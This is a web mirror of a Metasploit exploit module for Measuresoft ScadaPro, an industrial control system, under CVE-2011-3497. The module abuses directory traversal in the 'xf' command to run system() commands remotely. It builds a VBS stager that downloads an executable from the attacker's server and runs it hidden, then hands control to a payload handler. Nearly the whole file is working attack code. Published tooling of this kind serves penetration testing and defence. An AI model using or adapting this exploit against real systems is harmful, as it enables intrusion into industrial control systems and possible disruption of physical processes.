Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/windows/scada/scadapro_cmdexe.rb
19516 views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
class MetasploitModule < Msf::Exploit::Remote
7
Rank = ExcellentRanking
8
9
include Msf::Exploit::Remote::HttpServer::HTML
10
include Msf::Exploit::Remote::Tcp
11
include Msf::Exploit::EXE
12
13
def initialize(info = {})
14
super(
15
update_info(
16
info,
17
'Name' => 'Measuresoft ScadaPro Remote Command Execution',
18
'Description' => %q{
19
This module allows remote attackers to execute arbitrary commands on the
20
affected system by abusing via Directory Traversal attack when using the
21
'xf' command (execute function). An attacker can execute system() from
22
msvcrt.dll to upload a backdoor and gain remote code execution. This
23
vulnerability affects version 4.0.0 and earlier.
24
},
25
'License' => MSF_LICENSE,
26
'Author' => [
27
'Luigi Auriemma', # Initial discovery/poc
28
'mr_me <steventhomasseeley[at]gmail.com>', # msf
29
'TecR0c <tecr0c[at]tecninja.net>', # msf
30
],
31
'References' => [
32
[ 'CVE', '2011-3497'],
33
[ 'OSVDB', '75490'],
34
[ 'BID', '49613'],
35
[ 'URL', 'http://aluigi.altervista.org/adv/scadapro_1-adv.txt'],
36
[ 'URL', 'http://us-cert.gov/control_systems/pdf/ICS-ALERT-11-256-04.pdf'],
37
# seemed pretty accurate to us ;)
38
[ 'URL', 'http://www.measuresoft.net/news/post/Inaccurate-Reports-of-Measuresoft-ScadaPro-400-Vulnerability.aspx'],
39
],
40
'DefaultOptions' => {
41
'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
42
},
43
'Platform' => 'win',
44
'Targets' => [
45
# truly universal
46
[ 'Automatic', {} ],
47
],
48
'DefaultTarget' => 0,
49
'DisclosureDate' => '2011-09-16',
50
'Notes' => {
51
'Reliability' => UNKNOWN_RELIABILITY,
52
'Stability' => UNKNOWN_STABILITY,
53
'SideEffects' => UNKNOWN_SIDE_EFFECTS
54
}
55
)
56
)
57
58
register_options(
59
[
60
Opt::RPORT(11234),
61
OptString.new('URIPATH', [ true, "The URI to use.", "/" ]),
62
]
63
)
64
end
65
66
# couldn't generate a vbs or exe payload and then use the wF command
67
# as there is a limit to the amount of data to write to disk.
68
# so we just write out a vbs script like the old days.
69
70
def build_vbs(url, stager_name)
71
name_xmlhttp = rand_text_alpha(2)
72
name_adodb = rand_text_alpha(2)
73
74
tmp = "#{@temp_folder}/#{stager_name}"
75
76
vbs = "echo Set #{name_xmlhttp} = CreateObject(\"Microsoft.XMLHTTP\") "
77
vbs << ": #{name_xmlhttp}.open \"GET\",\"http://#{url}\",False : #{name_xmlhttp}.send"
78
vbs << ": Set #{name_adodb} = CreateObject(\"ADODB.Stream\") "
79
vbs << ": #{name_adodb}.Open : #{name_adodb}.Type=1 "
80
vbs << ": #{name_adodb}.Write #{name_xmlhttp}.responseBody "
81
vbs << ": #{name_adodb}.SaveToFile \"#{@temp_folder}/#{@payload_name}.exe\",2 "
82
vbs << ": CreateObject(\"WScript.Shell\").Run \"#{@temp_folder}/#{@payload_name}.exe\",0 >> #{tmp}"
83
84
return vbs
85
end
86
87
def on_request_uri(cli, request)
88
if request.uri =~ /\.exe/
89
print_status("Sending 2nd stage payload")
90
return if ((p = regenerate_payload(cli)) == nil)
91
92
data = generate_payload_exe({ :code => p.encoded })
93
send_response(cli, data, { 'Content-Type' => 'application/octet-stream' })
94
return
95
end
96
end
97
98
def exploit
99
# In order to save binary data to the file system the payload is written to a .vbs
100
# file and execute it from there.
101
@payload_name = rand_text_alpha(4)
102
@temp_folder = "C:/Windows/Temp"
103
104
if datastore['SRVHOST'] == '0.0.0.0'
105
lhost = Rex::Socket.source_address('50.50.50.50')
106
else
107
lhost = datastore['SRVHOST']
108
end
109
110
payload_src = lhost
111
payload_src << ":#{datastore['SRVPORT']}#{datastore['URIPATH']}#{@payload_name}.exe"
112
113
stager_name = rand_text_alpha(6) + ".vbs"
114
stager = build_vbs(payload_src, stager_name)
115
116
path = "..\\..\\..\\..\\..\\windows\\system32"
117
118
createvbs = "xf%#{path}\\msvcrt.dll,system,cmd /c #{stager}\r\n"
119
download_execute = "xf%#{path}\\msvcrt.dll,system,start #{@temp_folder}/#{stager_name}\r\n"
120
121
print_status("Sending 1st stage payload...")
122
123
connect
124
sock.get_once()
125
sock.put(createvbs)
126
sock.get_once()
127
sock.put(download_execute)
128
handler()
129
disconnect
130
131
super
132
end
133
end
134
135